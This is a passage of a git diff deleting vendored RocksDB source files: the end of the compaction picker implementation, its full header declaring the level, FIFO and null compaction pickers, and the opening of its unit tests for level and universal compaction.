-    uint32_t output_path_id, const InternalKey* begin, const InternalKey* end,
-    InternalKey** compaction_end, bool* manual_conflict) {
-  assert(input_level == 0);
-  assert(output_level == 0);
-  *compaction_end = nullptr;
-  LogBuffer log_buffer(InfoLogLevel::INFO_LEVEL, ioptions_.info_log);
-  Compaction* c =
-      PickCompaction(cf_name, mutable_cf_options, vstorage, &log_buffer);
-  log_buffer.FlushBufferToLog();
-  return c;
-}
-
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/compaction_picker.h b/thirdparty/rocksdb/db/compaction_picker.h
deleted file mode 100644
index f44139c..0000000
--- a/thirdparty/rocksdb/db/compaction_picker.h
+++ /dev/null
@@ -1,298 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <memory>
-#include <set>
-#include <string>
-#include <unordered_set>
-#include <vector>
-
-#include "db/compaction.h"
-#include "db/version_set.h"
-#include "options/cf_options.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class LogBuffer;
-class Compaction;
-class VersionStorageInfo;
-struct CompactionInputFiles;
-
-class CompactionPicker {
- public:
-  CompactionPicker(const ImmutableCFOptions& ioptions,
-                   const InternalKeyComparator* icmp);
-  virtual ~CompactionPicker();
-
-  // Pick level and inputs for a new compaction.
-  // Returns nullptr if there is no compaction to be done.
-  // Otherwise returns a pointer to a heap-allocated object that
-  // describes the compaction.  Caller should delete the result.
-  virtual Compaction* PickCompaction(const std::string& cf_name,
-                                     const MutableCFOptions& mutable_cf_options,
-                                     VersionStorageInfo* vstorage,
-                                     LogBuffer* log_buffer) = 0;
-
-  // Return a compaction object for compacting the range [begin,end] in
-  // the specified level.  Returns nullptr if there is nothing in that
-  // level that overlaps the specified range.  Caller should delete
-  // the result.
-  //
-  // The returned Compaction might not include the whole requested range.
-  // In that case, compaction_end will be set to the next key that needs
-  // compacting. In case the compaction will compact the whole range,
-  // compaction_end will be set to nullptr.
-  // Client is responsible for compaction_end storage -- when called,
-  // *compaction_end should point to valid InternalKey!
-  virtual Compaction* CompactRange(
-      const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-      VersionStorageInfo* vstorage, int input_level, int output_level,
-      uint32_t output_path_id, const InternalKey* begin, const InternalKey* end,
-      InternalKey** compaction_end, bool* manual_conflict);
-
-  // The maximum allowed output level.  Default value is NumberLevels() - 1.
-  virtual int MaxOutputLevel() const { return NumberLevels() - 1; }
-
-  virtual bool NeedsCompaction(const VersionStorageInfo* vstorage) const = 0;
-
-// Sanitize the input set of compaction input files.
-// When the input parameters do not describe a valid compaction, the
-// function will try to fix the input_files by adding necessary
-// files.  If it's not possible to conver an invalid input_files
-// into a valid one by adding more files, the function will return a
-// non-ok status with specific reason.
-#ifndef ROCKSDB_LITE
-  Status SanitizeCompactionInputFiles(std::unordered_set<uint64_t>* input_files,
-                                      const ColumnFamilyMetaData& cf_meta,
-                                      const int output_level) const;
-#endif  // ROCKSDB_LITE
-
-  // Free up the files that participated in a compaction
-  //
-  // Requirement: DB mutex held
-  void ReleaseCompactionFiles(Compaction* c, Status status);
-
-  // Returns true if any one of the specified files are being compacted
-  bool AreFilesInCompaction(const std::vector<FileMetaData*>& files);
-
-  // Takes a list of CompactionInputFiles and returns a (manual) Compaction
-  // object.
-  Compaction* CompactFiles(const CompactionOptions& compact_options,
-                           const std::vector<CompactionInputFiles>& input_files,
-                           int output_level, VersionStorageInfo* vstorage,
-                           const MutableCFOptions& mutable_cf_options,
-                           uint32_t output_path_id);
-
-  // Converts a set of compaction input file numbers into
-  // a list of CompactionInputFiles.
-  Status GetCompactionInputsFromFileNumbers(
-      std::vector<CompactionInputFiles>* input_files,
-      std::unordered_set<uint64_t>* input_set,
-      const VersionStorageInfo* vstorage,
-      const CompactionOptions& compact_options) const;
-
-  // Is there currently a compaction involving level 0 taking place
-  bool IsLevel0CompactionInProgress() const {
-    return !level0_compactions_in_progress_.empty();
-  }
-
-  // Return true if the passed key range overlap with a compaction output
-  // that is currently running.
-  bool RangeOverlapWithCompaction(const Slice& smallest_user_key,
-                                  const Slice& largest_user_key,
-                                  int level) const;
-
-  // Stores the minimal range that covers all entries in inputs in
-  // *smallest, *largest.
-  // REQUIRES: inputs is not empty
-  void GetRange(const CompactionInputFiles& inputs, InternalKey* smallest,
-                InternalKey* largest) const;
-
-  // Stores the minimal range that covers all entries in inputs1 and inputs2
-  // in *smallest, *largest.
-  // REQUIRES: inputs is not empty
-  void GetRange(const CompactionInputFiles& inputs1,
-                const CompactionInputFiles& inputs2, InternalKey* smallest,
-                InternalKey* largest) const;
-
-  // Stores the minimal range that covers all entries in inputs
-  // in *smallest, *largest.
-  // REQUIRES: inputs is not empty (at least on entry have one file)
-  void GetRange(const std::vector<CompactionInputFiles>& inputs,
-                InternalKey* smallest, InternalKey* largest) const;
-
-  int NumberLevels() const { return ioptions_.num_levels; }
-
-  // Add more files to the inputs on "level" to make sure that
-  // no newer version of a key is compacted to "level+1" while leaving an older
-  // version in a "level". Otherwise, any Get() will search "level" first,
-  // and will likely return an old/stale value for the key, since it always
-  // searches in increasing order of level to find the value. This could
-  // also scramble the order of merge operands. This function should be
-  // called any time a new Compaction is created, and its inputs_[0] are
-  // populated.
-  //
-  // Will return false if it is impossible to apply this compaction.
-  bool ExpandInputsToCleanCut(const std::string& cf_name,
-                              VersionStorageInfo* vstorage,
-                              CompactionInputFiles* inputs);
-
-  // Returns true if any one of the parent files are being compacted
-  bool IsRangeInCompaction(VersionStorageInfo* vstorage,
-                           const InternalKey* smallest,
-                           const InternalKey* largest, int level, int* index);
-
-  // Returns true if the key range that `inputs` files cover overlap with the
-  // key range of a currently running compaction.
-  bool FilesRangeOverlapWithCompaction(
-      const std::vector<CompactionInputFiles>& inputs, int level) const;
-
-  bool SetupOtherInputs(const std::string& cf_name,
-                        const MutableCFOptions& mutable_cf_options,
-                        VersionStorageInfo* vstorage,
-                        CompactionInputFiles* inputs,
-                        CompactionInputFiles* output_level_inputs,
-                        int* parent_index, int base_index);
-
-  void GetGrandparents(VersionStorageInfo* vstorage,
-                       const CompactionInputFiles& inputs,
-                       const CompactionInputFiles& output_level_inputs,
-                       std::vector<FileMetaData*>* grandparents);
-
-  // Register this compaction in the set of running compactions
-  void RegisterCompaction(Compaction* c);
-
-  // Remove this compaction from the set of running compactions
-  void UnregisterCompaction(Compaction* c);
-
-  std::set<Compaction*>* level0_compactions_in_progress() {
-    return &level0_compactions_in_progress_;
-  }
-  std::unordered_set<Compaction*>* compactions_in_progress() {
-    return &compactions_in_progress_;
-  }
-
- protected:
-  const ImmutableCFOptions& ioptions_;
-
-// A helper function to SanitizeCompactionInputFiles() that
-// sanitizes "input_files" by adding necessary files.
-#ifndef ROCKSDB_LITE
-  virtual Status SanitizeCompactionInputFilesForAllLevels(
-      std::unordered_set<uint64_t>* input_files,
-      const ColumnFamilyMetaData& cf_meta, const int output_level) const;
-#endif  // ROCKSDB_LITE
-
-  // Keeps track of all compactions that are running on Level0.
-  // Protected by DB mutex
-  std::set<Compaction*> level0_compactions_in_progress_;
-
-  // Keeps track of all compactions that are running.
-  // Protected by DB mutex
-  std::unordered_set<Compaction*> compactions_in_progress_;
-
-  const InternalKeyComparator* const icmp_;
-};
-
-class LevelCompactionPicker : public CompactionPicker {
- public:
-  LevelCompactionPicker(const ImmutableCFOptions& ioptions,
-                        const InternalKeyComparator* icmp)
-      : CompactionPicker(ioptions, icmp) {}
-  virtual Compaction* PickCompaction(const std::string& cf_name,
-                                     const MutableCFOptions& mutable_cf_options,
-                                     VersionStorageInfo* vstorage,
-                                     LogBuffer* log_buffer) override;
-
-  virtual bool NeedsCompaction(
-      const VersionStorageInfo* vstorage) const override;
-};
-
-#ifndef ROCKSDB_LITE
-class FIFOCompactionPicker : public CompactionPicker {
- public:
-  FIFOCompactionPicker(const ImmutableCFOptions& ioptions,
-                       const InternalKeyComparator* icmp)
-      : CompactionPicker(ioptions, icmp) {}
-
-  virtual Compaction* PickCompaction(const std::string& cf_name,
-                                     const MutableCFOptions& mutable_cf_options,
-                                     VersionStorageInfo* version,
-                                     LogBuffer* log_buffer) override;
-
-  virtual Compaction* CompactRange(
-      const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-      VersionStorageInfo* vstorage, int input_level, int output_level,
-      uint32_t output_path_id, const InternalKey* begin, const InternalKey* end,
-      InternalKey** compaction_end, bool* manual_conflict) override;
-
-  // The maximum allowed output level.  Always returns 0.
-  virtual int MaxOutputLevel() const override { return 0; }
-
-  virtual bool NeedsCompaction(
-      const VersionStorageInfo* vstorage) const override;
-
- private:
-  Compaction* PickTTLCompaction(const std::string& cf_name,
-                                const MutableCFOptions& mutable_cf_options,
-                                VersionStorageInfo* version,
-                                LogBuffer* log_buffer);
-
-  Compaction* PickSizeCompaction(const std::string& cf_name,
-                                 const MutableCFOptions& mutable_cf_options,
-                                 VersionStorageInfo* version,
-                                 LogBuffer* log_buffer);
-};
-
-class NullCompactionPicker : public CompactionPicker {
- public:
-  NullCompactionPicker(const ImmutableCFOptions& ioptions,
-                       const InternalKeyComparator* icmp)
-      : CompactionPicker(ioptions, icmp) {}
-  virtual ~NullCompactionPicker() {}
-
-  // Always return "nullptr"
-  Compaction* PickCompaction(const std::string& cf_name,
-                             const MutableCFOptions& mutable_cf_options,
-                             VersionStorageInfo* vstorage,
-                             LogBuffer* log_buffer) override {
-    return nullptr;
-  }
-
-  // Always return "nullptr"
-  Compaction* CompactRange(const std::string& cf_name,
-                           const MutableCFOptions& mutable_cf_options,
-                           VersionStorageInfo* vstorage, int input_level,
-                           int output_level, uint32_t output_path_id,
-                           const InternalKey* begin, const InternalKey* end,
-                           InternalKey** compaction_end,
-                           bool* manual_conflict) override {
-    return nullptr;
-  }
-
-  // Always returns false.
-  virtual bool NeedsCompaction(
-      const VersionStorageInfo* vstorage) const override {
-    return false;
-  }
-};
-#endif  // !ROCKSDB_LITE
-
-CompressionType GetCompressionType(const ImmutableCFOptions& ioptions,
-                                   const VersionStorageInfo* vstorage,
-                                   const MutableCFOptions& mutable_cf_options,
-                                   int level, int base_level,
-                                   const bool enable_compression = true);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/compaction_picker_test.cc b/thirdparty/rocksdb/db/compaction_picker_test.cc
deleted file mode 100644
index bba2d07..0000000
--- a/thirdparty/rocksdb/db/compaction_picker_test.cc
+++ /dev/null
@@ -1,1441 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/compaction_picker.h"
-#include <limits>
-#include <string>
-#include <utility>
-#include "db/compaction.h"
-#include "db/compaction_picker_universal.h"
-
-#include "util/logging.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class CountingLogger : public Logger {
- public:
-  using Logger::Logv;
-  virtual void Logv(const char* format, va_list ap) override { log_count++; }
-  size_t log_count;
-};
-
-class CompactionPickerTest : public testing::Test {
- public:
-  const Comparator* ucmp_;
-  InternalKeyComparator icmp_;
-  Options options_;
-  ImmutableCFOptions ioptions_;
-  MutableCFOptions mutable_cf_options_;
-  LevelCompactionPicker level_compaction_picker;
-  std::string cf_name_;
-  CountingLogger logger_;
-  LogBuffer log_buffer_;
-  uint32_t file_num_;
-  CompactionOptionsFIFO fifo_options_;
-  std::unique_ptr<VersionStorageInfo> vstorage_;
-  std::vector<std::unique_ptr<FileMetaData>> files_;
-  // does not own FileMetaData
-  std::unordered_map<uint32_t, std::pair<FileMetaData*, int>> file_map_;
-  // input files to compaction process.
-  std::vector<CompactionInputFiles> input_files_;
-  int compaction_level_start_;
-
-  CompactionPickerTest()
-      : ucmp_(BytewiseComparator()),
-        icmp_(ucmp_),
-        ioptions_(options_),
-        mutable_cf_options_(options_),
-        level_compaction_picker(ioptions_, &icmp_),
-        cf_name_("dummy"),
-        log_buffer_(InfoLogLevel::INFO_LEVEL, &logger_),
-        file_num_(1),
-        vstorage_(nullptr) {
-    fifo_options_.max_table_files_size = 1;
-    mutable_cf_options_.RefreshDerivedOptions(ioptions_);
-    ioptions_.db_paths.emplace_back("dummy",
-                                    std::numeric_limits<uint64_t>::max());
-  }
-
-  ~CompactionPickerTest() {
-  }
-
-  void NewVersionStorage(int num_levels, CompactionStyle style) {
-    DeleteVersionStorage();
-    options_.num_levels = num_levels;
-    vstorage_.reset(new VersionStorageInfo(&icmp_, ucmp_, options_.num_levels,
-                                           style, nullptr, false));
-    vstorage_->CalculateBaseBytes(ioptions_, mutable_cf_options_);
-  }
-
-  void DeleteVersionStorage() {
-    vstorage_.reset();
-    files_.clear();
-    file_map_.clear();
-    input_files_.clear();
-  }
-
-  void Add(int level, uint32_t file_number, const char* smallest,
-           const char* largest, uint64_t file_size = 1, uint32_t path_id = 0,
-           SequenceNumber smallest_seq = 100,
-           SequenceNumber largest_seq = 100) {
-    assert(level < vstorage_->num_levels());
-    FileMetaData* f = new FileMetaData;
-    f->fd = FileDescriptor(file_number, path_id, file_size);
-    f->smallest = InternalKey(smallest, smallest_seq, kTypeValue);
-    f->largest = InternalKey(largest, largest_seq, kTypeValue);
-    f->smallest_seqno = smallest_seq;
-    f->largest_seqno = largest_seq;
-    f->compensated_file_size = file_size;
-    f->refs = 0;
-    vstorage_->AddFile(level, f);
-    files_.emplace_back(f);
-    file_map_.insert({file_number, {f, level}});
-  }
-
-  void SetCompactionInputFilesLevels(int level_count, int start_level) {
-    input_files_.resize(level_count);
-    for (int i = 0; i < level_count; ++i) {
-      input_files_[i].level = start_level + i;
-    }
-    compaction_level_start_ = start_level;
-  }
-
-  void AddToCompactionFiles(uint32_t file_number) {
-    auto iter = file_map_.find(file_number);
-    assert(iter != file_map_.end());
-    int level = iter->second.second;
-    assert(level < vstorage_->num_levels());
-    input_files_[level - compaction_level_start_].files.emplace_back(
-        iter->second.first);
-  }
-
-  void UpdateVersionStorageInfo() {
-    vstorage_->CalculateBaseBytes(ioptions_, mutable_cf_options_);
-    vstorage_->UpdateFilesByCompactionPri(ioptions_.compaction_pri);
-    vstorage_->UpdateNumNonEmptyLevels();
-    vstorage_->GenerateFileIndexer();
-    vstorage_->GenerateLevelFilesBrief();
-    vstorage_->ComputeCompactionScore(ioptions_, mutable_cf_options_);
-    vstorage_->GenerateLevel0NonOverlapping();
-    vstorage_->ComputeFilesMarkedForCompaction();
-    vstorage_->SetFinalized();
-  }
-};
-
-TEST_F(CompactionPickerTest, Empty) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  UpdateVersionStorageInfo();
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() == nullptr);
-}
-
-TEST_F(CompactionPickerTest, Single) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  Add(0, 1U, "p", "q");
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() == nullptr);
-}
-
-TEST_F(CompactionPickerTest, Level0Trigger) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  Add(0, 1U, "150", "200");
-  Add(0, 2U, "200", "250");
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_files(0));
-  ASSERT_EQ(1U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(2U, compaction->input(0, 1)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, Level1Trigger) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  Add(1, 66U, "150", "200", 1000000000U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(66U, compaction->input(0, 0)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, Level1Trigger2) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  Add(1, 66U, "150", "200", 1000000001U);
-  Add(1, 88U, "201", "300", 1000000000U);
-  Add(2, 6U, "150", "179", 1000000000U);
-  Add(2, 7U, "180", "220", 1000000000U);
-  Add(2, 8U, "221", "300", 1000000000U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(2U, compaction->num_input_files(1));
-  ASSERT_EQ(66U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(6U, compaction->input(1, 0)->fd.GetNumber());
-  ASSERT_EQ(7U, compaction->input(1, 1)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, LevelMaxScore) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.target_file_size_base = 10000000;
-  mutable_cf_options_.target_file_size_multiplier = 10;
-  mutable_cf_options_.max_bytes_for_level_base = 10 * 1024 * 1024;
-  Add(0, 1U, "150", "200", 1000000U);
-  // Level 1 score 1.2
-  Add(1, 66U, "150", "200", 6000000U);
-  Add(1, 88U, "201", "300", 6000000U);
-  // Level 2 score 1.8. File 7 is the largest. Should be picked
-  Add(2, 6U, "150", "179", 60000000U);
-  Add(2, 7U, "180", "220", 60000001U);
-  Add(2, 8U, "221", "300", 60000000U);
-  // Level 3 score slightly larger than 1
-  Add(3, 26U, "150", "170", 260000000U);
-  Add(3, 27U, "171", "179", 260000000U);
-  Add(3, 28U, "191", "220", 260000000U);
-  Add(3, 29U, "221", "300", 260000000U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(7U, compaction->input(0, 0)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, NeedsCompactionLevel) {
-  const int kLevels = 6;
-  const int kFileCount = 20;
-
-  for (int level = 0; level < kLevels - 1; ++level) {
-    NewVersionStorage(kLevels, kCompactionStyleLevel);
-    uint64_t file_size = vstorage_->MaxBytesForLevel(level) * 2 / kFileCount;
-    for (int file_count = 1; file_count <= kFileCount; ++file_count) {
-      // start a brand new version in each test.
-      NewVersionStorage(kLevels, kCompactionStyleLevel);
-      for (int i = 0; i < file_count; ++i) {
-        Add(level, i, ToString((i + 100) * 1000).c_str(),
-            ToString((i + 100) * 1000 + 999).c_str(),
-            file_size, 0, i * 100, i * 100 + 99);
-      }
-      UpdateVersionStorageInfo();
-      ASSERT_EQ(vstorage_->CompactionScoreLevel(0), level);
-      ASSERT_EQ(level_compaction_picker.NeedsCompaction(vstorage_.get()),
-                vstorage_->CompactionScore(0) >= 1);
-      // release the version storage
-      DeleteVersionStorage();
-    }
-  }
-}
-
-TEST_F(CompactionPickerTest, Level0TriggerDynamic) {
-  int num_levels = ioptions_.num_levels;
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  mutable_cf_options_.max_bytes_for_level_base = 200;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-  NewVersionStorage(num_levels, kCompactionStyleLevel);
-  Add(0, 1U, "150", "200");
-  Add(0, 2U, "200", "250");
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_files(0));
-  ASSERT_EQ(1U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(2U, compaction->input(0, 1)->fd.GetNumber());
-  ASSERT_EQ(1, static_cast<int>(compaction->num_input_levels()));
-  ASSERT_EQ(num_levels - 1, compaction->output_level());
-}
-
-TEST_F(CompactionPickerTest, Level0TriggerDynamic2) {
-  int num_levels = ioptions_.num_levels;
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  mutable_cf_options_.max_bytes_for_level_base = 200;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-  NewVersionStorage(num_levels, kCompactionStyleLevel);
-  Add(0, 1U, "150", "200");
-  Add(0, 2U, "200", "250");
-  Add(num_levels - 1, 3U, "200", "250", 300U);
-
-  UpdateVersionStorageInfo();
-  ASSERT_EQ(vstorage_->base_level(), num_levels - 2);
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_files(0));
-  ASSERT_EQ(1U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(2U, compaction->input(0, 1)->fd.GetNumber());
-  ASSERT_EQ(1, static_cast<int>(compaction->num_input_levels()));
-  ASSERT_EQ(num_levels - 2, compaction->output_level());
-}
-
-TEST_F(CompactionPickerTest, Level0TriggerDynamic3) {
-  int num_levels = ioptions_.num_levels;
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  mutable_cf_options_.max_bytes_for_level_base = 200;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-  NewVersionStorage(num_levels, kCompactionStyleLevel);
-  Add(0, 1U, "150", "200");
-  Add(0, 2U, "200", "250");
-  Add(num_levels - 1, 3U, "200", "250", 300U);
-  Add(num_levels - 1, 4U, "300", "350", 3000U);
-
-  UpdateVersionStorageInfo();
-  ASSERT_EQ(vstorage_->base_level(), num_levels - 3);
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_files(0));
-  ASSERT_EQ(1U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(2U, compaction->input(0, 1)->fd.GetNumber());
-  ASSERT_EQ(1, static_cast<int>(compaction->num_input_levels()));
-  ASSERT_EQ(num_levels - 3, compaction->output_level());
-}
-
-TEST_F(CompactionPickerTest, Level0TriggerDynamic4) {
-  int num_levels = ioptions_.num_levels;
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  mutable_cf_options_.max_bytes_for_level_base = 200;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-
-  NewVersionStorage(num_levels, kCompactionStyleLevel);
-  Add(0, 1U, "150", "200");
-  Add(0, 2U, "200", "250");
-  Add(num_levels - 1, 3U, "200", "250", 300U);
-  Add(num_levels - 1, 4U, "300", "350", 3000U);
-  Add(num_levels - 3, 5U, "150", "180", 3U);
-  Add(num_levels - 3, 6U, "181", "300", 3U);
-  Add(num_levels - 3, 7U, "400", "450", 3U);
-
-  UpdateVersionStorageInfo();
-  ASSERT_EQ(vstorage_->base_level(), num_levels - 3);
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_files(0));
-  ASSERT_EQ(1U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(2U, compaction->input(0, 1)->fd.GetNumber());
-  ASSERT_EQ(2U, compaction->num_input_files(1));
-  ASSERT_EQ(num_levels - 3, compaction->level(1));
-  ASSERT_EQ(5U, compaction->input(1, 0)->fd.GetNumber());
-  ASSERT_EQ(6U, compaction->input(1, 1)->fd.GetNumber());
-  ASSERT_EQ(2, static_cast<int>(compaction->num_input_levels()));
-  ASSERT_EQ(num_levels - 3, compaction->output_level());
-}
-
-TEST_F(CompactionPickerTest, LevelTriggerDynamic4) {
-  int num_levels = ioptions_.num_levels;
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-  ioptions_.compaction_pri = kMinOverlappingRatio;
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  mutable_cf_options_.max_bytes_for_level_base = 200;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-  NewVersionStorage(num_levels, kCompactionStyleLevel);
-  Add(0, 1U, "150", "200");
-  Add(num_levels - 1, 3U, "200", "250", 300U);
-  Add(num_levels - 1, 4U, "300", "350", 3000U);
-  Add(num_levels - 1, 4U, "400", "450", 3U);
-  Add(num_levels - 2, 5U, "150", "180", 300U);
-  Add(num_levels - 2, 6U, "181", "350", 500U);
-  Add(num_levels - 2, 7U, "400", "450", 200U);
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(5U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(0, compaction->num_input_files(1));
-  ASSERT_EQ(1U, compaction->num_input_levels());
-  ASSERT_EQ(num_levels - 1, compaction->output_level());
-}
-
-// Universal and FIFO Compactions are not supported in ROCKSDB_LITE
-#ifndef ROCKSDB_LITE
-TEST_F(CompactionPickerTest, NeedsCompactionUniversal) {
-  NewVersionStorage(1, kCompactionStyleUniversal);
-  UniversalCompactionPicker universal_compaction_picker(
-      ioptions_, &icmp_);
-  // must return false when there's no files.
-  ASSERT_EQ(universal_compaction_picker.NeedsCompaction(vstorage_.get()),
-            false);
-  UpdateVersionStorageInfo();
-
-  // verify the trigger given different number of L0 files.
-  for (int i = 1;
-       i <= mutable_cf_options_.level0_file_num_compaction_trigger * 2; ++i) {
-    NewVersionStorage(1, kCompactionStyleUniversal);
-    Add(0, i, ToString((i + 100) * 1000).c_str(),
-        ToString((i + 100) * 1000 + 999).c_str(), 1000000, 0, i * 100,
-        i * 100 + 99);
-    UpdateVersionStorageInfo();
-    ASSERT_EQ(level_compaction_picker.NeedsCompaction(vstorage_.get()),
-              vstorage_->CompactionScore(0) >= 1);
-  }
-}
-
-TEST_F(CompactionPickerTest, CompactionUniversalIngestBehindReservedLevel) {
-  const uint64_t kFileSize = 100000;
-  NewVersionStorage(1, kCompactionStyleUniversal);
-  ioptions_.allow_ingest_behind = true;
-  ioptions_.num_levels = 3;
-  UniversalCompactionPicker universal_compaction_picker(ioptions_, &icmp_);
-  // must return false when there's no files.
-  ASSERT_EQ(universal_compaction_picker.NeedsCompaction(vstorage_.get()),
-            false);
-
-  NewVersionStorage(3, kCompactionStyleUniversal);
-
-  Add(0, 1U, "150", "200", kFileSize, 0, 500, 550);
-  Add(0, 2U, "201", "250", kFileSize, 0, 401, 450);
-  Add(0, 4U, "260", "300", kFileSize, 0, 260, 300);
-  Add(1, 5U, "100", "151", kFileSize, 0, 200, 251);
-  Add(1, 3U, "301", "350", kFileSize, 0, 101, 150);
-  Add(2, 6U, "120", "200", kFileSize, 0, 20, 100);
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(
-      universal_compaction_picker.PickCompaction(
-          cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-
-  // output level should be the one above the bottom-most
-  ASSERT_EQ(1, compaction->output_level());
-}
-// Tests if the files can be trivially moved in multi level
-// universal compaction when allow_trivial_move option is set
-// In this test as the input files overlaps, they cannot
-// be trivially moved.
-
-TEST_F(CompactionPickerTest, CannotTrivialMoveUniversal) {
-  const uint64_t kFileSize = 100000;
-
-  ioptions_.compaction_options_universal.allow_trivial_move = true;
-  NewVersionStorage(1, kCompactionStyleUniversal);
-  UniversalCompactionPicker universal_compaction_picker(ioptions_, &icmp_);
-  // must return false when there's no files.
-  ASSERT_EQ(universal_compaction_picker.NeedsCompaction(vstorage_.get()),
-            false);
-
-  NewVersionStorage(3, kCompactionStyleUniversal);
-
-  Add(0, 1U, "150", "200", kFileSize, 0, 500, 550);
-  Add(0, 2U, "201", "250", kFileSize, 0, 401, 450);
-  Add(0, 4U, "260", "300", kFileSize, 0, 260, 300);
-  Add(1, 5U, "100", "151", kFileSize, 0, 200, 251);
-  Add(1, 3U, "301", "350", kFileSize, 0, 101, 150);
-  Add(2, 6U, "120", "200", kFileSize, 0, 20, 100);
-
